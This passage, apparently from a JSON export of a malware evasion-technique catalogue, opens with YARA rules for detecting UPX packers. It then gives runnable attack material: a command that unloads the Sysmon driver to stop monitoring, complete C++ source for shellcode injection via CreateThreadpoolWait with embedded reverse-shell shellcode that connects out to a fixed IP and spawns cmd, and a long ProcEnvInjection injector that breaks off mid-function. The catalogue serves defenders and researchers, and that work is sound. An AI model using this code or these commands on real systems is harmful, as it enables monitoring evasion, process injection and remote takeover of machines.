pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? FF }\r\n        $b = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? 
FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_030_040_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 00 57 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 31 57 57 E9 3C FE 55 50 58 21 03 01 02 87 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_125_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 35 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_Scrambler_vna: PEiD\r\n{\r\n    strings:\r\n        $a = { C7 45 FC ?? ?? ?? ?? 6A 04 6A 00 6A 00 68 FF FF FB FF FF 15 ?? ?? ?? ?? 85 C0 7E ?? 6A 00 FF 15 ?? ?? 
?? ?? 8B 45 FC 8B 40 04 83 E8 03 8B 4D FC 89 41 04 83 65 F4 00 EB ?? 8B 45 F4 40 89 45 F4 8B 45 FC 8B 4D F4 3B 48 04 73 ?? 8B 45 FC 8B 40 04 2B 45 F4 8B 4D FC 8B 09 8B 55 FC 8B 44 01 FF 33 42 0C 8B 4D FC 8B 49 04 2B 4D F4 8B 55 FC 8B 12 89 44 11 FF EB ?? 8B 45 FC 8B 40 08 89 45 F8 8B 45 F8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_or_File_modifyer: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 86 EA FE FF 81 C2 45 23 01 00 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_072_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF FD F3 A4 FC F7 E1 93 87 F7 83 EE 00 19 ED 57 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 182,
            "unprotect_id": "U0407",
            "name": "Unloading Sysmon Driver",
            "categories": [
                {
                    "id": 6,
                    "key": "anti-monitoring",
                    "label": "Anti-Monitoring"
                }
            ],
            "description": "Sysmon can be used to monitor system activity. Unloading the Sysmon driver causes the system to stop recording Sysmon event logs, thus evading the monitoring.",
            "resources": "https://www.ired.team/offensive-security/defense-evasion/unloading-sysmon-driver",
            "tags": "",
            "snippets": [
                {
                    "id": 92,
                    "language": {
                        "id": 7,
                        "label": "cmd",
                        "code_class": "cmd"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/182/",
                    "description": "",
                    "plain_code": "fltMC.exe unload SysmonDrv"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 181,
            "unprotect_id": "U1236",
            "name": "Shellcode Injection via CreateThreadpoolWait",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "Malware can inject shellcode via the `CreateThreadpoolWait` API.\r\n\r\n1. `CreateEvent` is used to create an event object in the Signaled state.\r\n2. RWX memory for the shellcode is allocated with `VirtualAlloc` and the shellcode is written there.\r\n3. `CreateThreadpoolWait` is used to create a wait object. The first argument of the function is a callback function, which will be called once the wait ends (immediately in our case, since our waitable event is in the Signaled state from the start). We pass the address of our shellcode (allocated in step 2) as the callback function.\r\n4. `SetThreadpoolWait` is used to bind the event created in step 1 to the wait object created in step 3.\r\n5. `WaitForSingleObject` is used to wait for the waitable object to become Signaled, but since our event (waitable) object was created in the Signaled state in step 1, the callback function specified in step 3 is called and the shellcode is executed right away:",
            "resources": "https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait",
            "tags": "injection",
            "snippets": [
                {
                    "id": 89,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/181/",
                    "description": "Original source code: https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait",
                    "plain_code": "#include <windows.h>\r\n#include <threadpoolapiset.h>\r\n\r\nunsigned char shellcode[] = \r\n\"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\"\r\n\"\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\"\r\n\"\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\"\r\n\"\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\"\r\n\"\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\"\r\n\"\\x01\\xd0\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\"\r\n\"\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\"\r\n\"\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\"\r\n\"\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\"\r\n\"\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\"\r\n\"\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\"\r\n\"\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\"\r\n\"\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\r\n\"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\\x5f\\x33\"\r\n\"\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\\xa0\\x01\\x00\\x00\"\r\n\"\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x01\\xbb\\xc0\\xa8\\x38\\x66\\x41\\x54\"\r\n\"\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x4c\"\r\n\"\\x89\\xea\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xba\\x29\\x80\\x6b\\x00\\xff\"\r\n\"\\xd5\\x50\\x50\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48\\xff\\xc0\\x48\\x89\\xc2\"\r\n\"\\x48\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x48\"\r\n\"\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89\\xe2\\x48\\x89\\xf9\\x41\\xba\\x99\"\r\n\"\\xa5\\x74\\x61\\xff\\xd5\\x48\\x81\\xc4\\x40\\x02\\x00\\x00\\x49\\xb8\\x63\"\r\n\"\\x6d\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x5
0\\x41\\x50\\x48\\x89\\xe2\\x57\"\r\n\"\\x57\\x57\\x4d\\x31\\xc0\\x6a\\x0d\\x59\\x41\\x50\\xe2\\xfc\\x66\\xc7\\x44\"\r\n\"\\x24\\x54\\x01\\x01\\x48\\x8d\\x44\\x24\\x18\\xc6\\x00\\x68\\x48\\x89\\xe6\"\r\n\"\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xff\\xc0\\x41\\x50\\x49\\xff\"\r\n\"\\xc8\\x4d\\x89\\xc1\\x4c\\x89\\xc1\\x41\\xba\\x79\\xcc\\x3f\\x86\\xff\\xd5\"\r\n\"\\x48\\x31\\xd2\\x48\\xff\\xca\\x8b\\x0e\\x41\\xba\\x08\\x87\\x1d\\x60\\xff\"\r\n\"\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\\xba\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x48\"\r\n\"\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\"\r\n\"\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\\xd5\";\r\n\r\n\r\nint main()\r\n{\r\n\tHANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);\r\n\tLPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tRtlMoveMemory(shellcodeAddress, shellcode, sizeof(shellcode));\r\n\r\n\tPTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);\r\n\tSetThreadpoolWait(threadPoolWait, event, NULL);\r\n\tWaitForSingleObject(event, INFINITE);\r\n\t\r\n\treturn 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 180,
            "unprotect_id": "U0219",
            "name": "Thwarting Stack-Frame Analysis",
            "categories": [
                {
                    "id": 5,
                    "key": "anti-disassembly",
                    "label": "Anti-Disassembly"
                }
            ],
            "description": "A stack frame is a collection of local variables, the arguments passed to the function, the return address and the previous function's base pointer. A function can easily be analyzed by extracting information from its stack frame, but a disassembler's analysis of the stack frame can be defeated by using nefarious tricks.",
            "resources": "https://1malware1.medium.com/anti-disassembly-techniques-e012338f2ae0",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 179,
            "unprotect_id": "U0218",
            "name": "Misusing Structured Exception Handlers",
            "categories": [
                {
                    "id": 5,
                    "key": "anti-disassembly",
                    "label": "Anti-Disassembly"
                }
            ],
            "description": "The Structured Exception Handler (SEH) chain is a linked list of functions that are used to handle exceptions in a program. It can be misused to fool disassemblers. The FS segment register is used to gain access to the thread environment block (TEB); the first structure in the TEB is the thread information block (TIB), and the first element in the TIB is a pointer to the SEH chain, which functions as a stack.",
            "resources": "https://1malware1.medium.com/anti-disassembly-techniques-e012338f2ae0",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 178,
            "unprotect_id": "U1235",
            "name": "ProcEnvInjection - Remote code injection by abusing process environment strings",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "This method allows custom code to be injected into a remote process without using `WriteProcessMemory`: it uses the `lpEnvironment` parameter of `CreateProcess` to copy the code into the target process. This technique can be used to load a DLL into a remote process, or simply to execute a block of code.\r\n\r\nThe `lpEnvironment` parameter of `CreateProcess` allows us to specify a custom environment string for the target process. The environment string contains a set of environment variable entries, such as `PATH=C:\\Windows\\system32;C:\\Windows`. Each environment variable in the list is separated by a null terminator character, and the final entry in the list is a blank string (two null terminator characters). When a new process is created, the environment string is copied into the virtual memory of the process, where it can be accessed via the PEB.\r\n\r\nIn summary, the injector process takes the following steps:\r\n\r\n1. Create a generic \"code loader\" block that does not contain any 0x00 bytes; values are XOR-encoded where necessary.\r\n2. Use `GetEnvironmentStringsW` to retrieve the existing environment string and copy it to a temporary buffer. Our \"generic code loader\" entry is appended after the existing entries. Some programs make use of the environment variables, so it is not a good idea to overwrite the existing entries.\r\n3. Create a suspended instance of the target EXE process using `CreateProcess`, passing our custom environment string as `lpEnvironment`. We also use the `CREATE_UNICODE_ENVIRONMENT` flag to specify a wide-char environment value; otherwise the string would be converted from ANSI to wide-char, which would break our loader code.\r\n4. Use `NtQueryInformationProcess` to retrieve the PEB address of the target process.\r\n5. Call `NtCreateThreadEx` to call Sleep(0) in the target process and wait for the thread to exit. This forces the necessary PEB fields to become initialised in the target process.\r\n6. Calculate the address of the environment string in the target process (PEB -> `RtlUserProcessParameters` -> Environment).\r\n7. Locate the address of our loader code within the environment string and call `VirtualProtectEx` to make this data executable.\r\n8. Call `NtCreateThreadEx` to execute the loader code within the target process. This code reads the final payload back from the injector process and executes it.\r\n9. Restore the original memory protection after the payload has finished executing.\r\n10. Call `ResumeThread` to continue normal execution of the target process.",
            "resources": "https://www.x86matthew.com/view_post?id=proc_env_injection",
            "tags": "",
            "snippets": [
                {
                    "id": 75,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/178/",
                    "description": "Author: @x86matthew",
                    "plain_code": "#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#define LOADER_CODE_OFFSET 8\r\n\r\nstruct PROCESS_BASIC_INFORMATION\r\n{\r\n\tDWORD ExitStatus;\r\n\tBYTE *PebBaseAddress;\r\n\tDWORD *AffinityMask;\r\n\tDWORD BasePriority;\r\n\tDWORD *UniqueProcessId;\r\n\tDWORD *InheritedFromUniqueProcessId;\r\n};\r\n\r\n#define ProcessBasicInformation 0\r\n\r\nDWORD (WINAPI *NtQueryInformationProcess)(HANDLE hProcessHandle, DWORD ProcessInformationClass, PVOID ProcessInformation, DWORD ProcessInformationLength, DWORD *ReturnLength);\r\nDWORD (WINAPI *NtCreateThreadEx)(HANDLE *phThreadHandle, DWORD DesiredAccess, PVOID ObjectAttributes, HANDLE hProcessHandle, PVOID StartRoutine, PVOID Argument, ULONG CreateFlags, DWORD *pZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PVOID AttributeList);\r\n\r\nBYTE bGlobal_LoaderCode[] =\r\n{\r\n\t// prefix\r\n\t'A', 0x00, 'A', 0x00, 'A', 0x00, '=', 0x00,\r\n\r\n\t// push edi\r\n\t0x57,\r\n\t// push esi\r\n\t0x56,\r\n\r\n\t// push 0x40 (PAGE_EXECUTE_READWRITE)\r\n\t0x6A, 0x40,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (MEM_COMMIT | MEM_RESERVE)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (Size)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (BaseAddr)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (VirtualAlloc)\r\n\t0xFF, 0xD0,\r\n\r\n\t// mov edi, eax (DataAddr)\r\n\t0x8B, 0xF8,\r\n\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (ProcessID)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (bInheritHandle)\r\n\t0x50,\r\n\t// push 0x10 
(PROCESS_VM_READ)\r\n\t0x6A, 0x10,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (OpenProcess)\r\n\t0xFF, 0xD0,\r\n\r\n\t// mov esi, eax (ProcessHandle)\r\n\t0x8B, 0xF0,\r\n\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (NumberOfBytesRead)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (BytesToRead)\r\n\t0x50,\r\n\t// push edi (ReadBuffer)\r\n\t0x57,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (BaseAddr)\r\n\t0x50,\r\n\t// push esi (ProcessHandle)\r\n\t0x56,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (ReadProcessMemory)\r\n\t0xFF, 0xD0,\r\n\r\n\t// push esi (ProcessHandle)\r\n\t0x56,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (CloseHandle)\r\n\t0xFF, 0xD0,\r\n\r\n\t// pushad\r\n\t0x60,\r\n\t// call edi (DataAddr)\r\n\t0xFF, 0xD7,\r\n\t// popad\r\n\t0x61,\r\n\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (MEM_RELEASE)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (Size)\r\n\t0x50,\r\n\t// push edi (DataAddr)\r\n\t0x57,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (VirtualFree)\r\n\t0xFF, 0xD0,\r\n\r\n\t// pop esi\r\n\t0x5E,\r\n\t// pop edi\r\n\t0x5F,\r\n\r\n\t// return from thread cleanly - can't use \"retn 4\"\r\n\t// pop eax\r\n\t0x58,\r\n\t// pop ecx\r\n\t0x59,\r\n\t// push eax\r\n\t0x50,\r\n\t// ret\r\n\t0xC3,\r\n\r\n\t// (end of string - 2 widechar 
null characters)\r\n\t0x00, 0x00, 0x00, 0x00\r\n};\r\n\r\nDWORD EncodeDwordValue(DWORD dwValue, DWORD *pdwXorValue, DWORD *pdwEncodedValue)\r\n{\r\n\tBYTE bOrigValue[4];\r\n\tBYTE bXorValue[4];\r\n\tBYTE bEncodedValue[4];\r\n\r\n\t// copy original value\r\n\tmemcpy((void*)bOrigValue, (void*)&dwValue, sizeof(DWORD));\r\n\r\n\t// encode value\r\n\tfor(DWORD i = 0; i < sizeof(DWORD); i++)\r\n\t{\r\n\t\tbXorValue[i] = 0x01;\r\n\t\tfor(;;)\r\n\t\t{\r\n\t\t\t// ensure the value contains no 0x00 bytes\r\n\t\t\tbEncodedValue[i] = bOrigValue[i] ^ bXorValue[i];\r\n\t\t\tif(bEncodedValue[i] == 0 || bXorValue[i] == 0)\r\n\t\t\t{\r\n\t\t\t\tbXorValue[i]++;\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\t// store values\r\n\t*pdwXorValue = *(DWORD*)bXorValue;\r\n\t*pdwEncodedValue = *(DWORD*)bEncodedValue;\r\n\r\n\treturn 0;\r\n}\r\n\r\nDWORD StartInjectedProcess(char *pExePath, BYTE *pPayload, DWORD dwPayloadSize)\r\n{\r\n\tSTARTUPINFO StartupInfo;\r\n\tPROCESS_INFORMATION ProcessInfo;\r\n\tBYTE bLoaderCode_Copy[sizeof(bGlobal_LoaderCode)];\r\n\tPROCESS_BASIC_INFORMATION ProcessBasicInfoData;\r\n\tBYTE *pRemotePtr_RtlUserProcessParameters = NULL;\r\n\tBYTE *pRemotePtr_EnvironmentStr = NULL;\r\n\tDWORD dwOriginalProtect = 0;\r\n\tHANDLE hThread = NULL;\r\n\tDWORD dwTempProtect = 0;\r\n\twchar_t *pOrigEnvBlock = NULL;\r\n\tDWORD dwOrigEnvBlockTotalLengthBytes = 0;\r\n\tDWORD dwCurrEnvEntryLength = 0;\r\n\twchar_t *pCurrEnvEntry = NULL;\r\n\tBYTE *pNewEnvBlock = NULL;\r\n\r\n\t// ensure the loader code is 16-bit aligned\r\n\tif((sizeof(bGlobal_LoaderCode) % 2) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Loader code is out of alignment\\n\");\r\n\t\t// loader code is out of alignment - add an extra 0x00 character to the end of the data\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Generating loader code...\\n\");\r\n\r\n\t// encode values in the loader code to ensure no 0x00 characters exist\r\n\tEncodeDwordValue(MEM_COMMIT | MEM_RESERVE, 
(DWORD*)&bGlobal_LoaderCode[13], (DWORD*)&bGlobal_LoaderCode[18]);\r\n\tEncodeDwordValue(dwPayloadSize, (DWORD*)&bGlobal_LoaderCode[24], (DWORD*)&bGlobal_LoaderCode[29]);\r\n\tEncodeDwordValue((DWORD)VirtualAlloc, (DWORD*)&bGlobal_LoaderCode[38], (DWORD*)&bGlobal_LoaderCode[43]);\r\n\tEncodeDwordValue(GetCurrentProcessId(), (DWORD*)&bGlobal_LoaderCode[52], (DWORD*)&bGlobal_LoaderCode[57]);\r\n\tEncodeDwordValue((DWORD)OpenProcess, (DWORD*)&bGlobal_LoaderCode[68], (DWORD*)&bGlobal_LoaderCode[73]);\r\n\tEncodeDwordValue(dwPayloadSize, (DWORD*)&bGlobal_LoaderCode[85], (DWORD*)&bGlobal_LoaderCode[90]);\r\n\tEncodeDwordValue((DWORD)pPayload, (DWORD*)&bGlobal_LoaderCode[97], (DWORD*)&bGlobal_LoaderCode[102]);\r\n\tEncodeDwordValue((DWORD)ReadProcessMemory, (DWORD*)&bGlobal_LoaderCode[109], (DWORD*)&bGlobal_LoaderCode[114]);\r\n\tEncodeDwordValue((DWORD)CloseHandle, (DWORD*)&bGlobal_LoaderCode[122], (DWORD*)&bGlobal_LoaderCode[127]);\r\n\tEncodeDwordValue(MEM_RELEASE, (DWORD*)&bGlobal_LoaderCode[138], (DWORD*)&bGlobal_LoaderCode[143]);\r\n\tEncodeDwordValue((DWORD)VirtualFree, (DWORD*)&bGlobal_LoaderCode[153], (DWORD*)&bGlobal_LoaderCode[158]);\r\n\r\n\tprintf(\"Appending code to existing environment string...\\n\");\r\n\r\n\t// get existing environment block\r\n\tpOrigEnvBlock = GetEnvironmentStringsW();\r\n\tif(pOrigEnvBlock == NULL)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read environment strings\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// calculate length of existing environment block\r\n\tfor(;;)\r\n\t{\r\n\t\t// get current environment string entry\r\n\t\tpCurrEnvEntry = (wchar_t*)((BYTE*)pOrigEnvBlock + dwOrigEnvBlockTotalLengthBytes);\r\n\r\n\t\t// calculate length\r\n\t\tdwCurrEnvEntryLength = wcslen(pCurrEnvEntry);\r\n\t\tif(dwCurrEnvEntryLength == 0)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t// increase total size counter\r\n\t\tdwOrigEnvBlockTotalLengthBytes += ((dwCurrEnvEntryLength + 1) * sizeof(wchar_t));\r\n\t}\r\n\r\n\t// allocate a new environment 
string buffer\r\n\tpNewEnvBlock = (BYTE*)VirtualAlloc(NULL, dwOrigEnvBlockTotalLengthBytes + sizeof(bGlobal_LoaderCode), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n\tif(pNewEnvBlock == NULL)\r\n\t{\r\n\t\tprintf(\"Error: Failed to allocate local memory\\n\");\r\n\r\n\t\t// error\r\n\t\tFreeEnvironmentStringsW(pOrigEnvBlock);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// copy the original values and append the loader code\r\n\tmemcpy((void*)pNewEnvBlock, pOrigEnvBlock, dwOrigEnvBlockTotalLengthBytes);\r\n\tmemcpy((void*)(pNewEnvBlock + dwOrigEnvBlockTotalLengthBytes), bGlobal_LoaderCode, sizeof(bGlobal_LoaderCode));\r\n\r\n\t// free temporary environment string buffer\r\n\tFreeEnvironmentStringsW(pOrigEnvBlock);\r\n\r\n\tprintf(\"Creating target process: '%s'...\\n\", pExePath);\r\n\r\n\t// launch target process with the injection code in the environment strings\t\r\n\tmemset(&StartupInfo, 0, sizeof(StartupInfo));\r\n\tStartupInfo.cb = sizeof(StartupInfo);\r\n\tif(CreateProcess(NULL, pExePath, NULL, NULL, 0, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT | CREATE_SUSPENDED, (wchar_t*)pNewEnvBlock, NULL, &StartupInfo, &ProcessInfo) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to launch target process\\n\");\r\n\r\n\t\t// error\r\n\t\tVirtualFree(pNewEnvBlock, 0, MEM_RELEASE);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// free environment block buffer\r\n\tVirtualFree(pNewEnvBlock, 0, MEM_RELEASE);\r\n\r\n\tprintf(\"Locating target code in remote process...\\n\");\r\n\r\n\t// get process info\r\n\tmemset((void*)&ProcessBasicInfoData, 0, sizeof(ProcessBasicInfoData));\r\n\tif(NtQueryInformationProcess(ProcessInfo.hProcess, ProcessBasicInformation, &ProcessBasicInfoData, sizeof(ProcessBasicInfoData), NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to retrieve process info\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 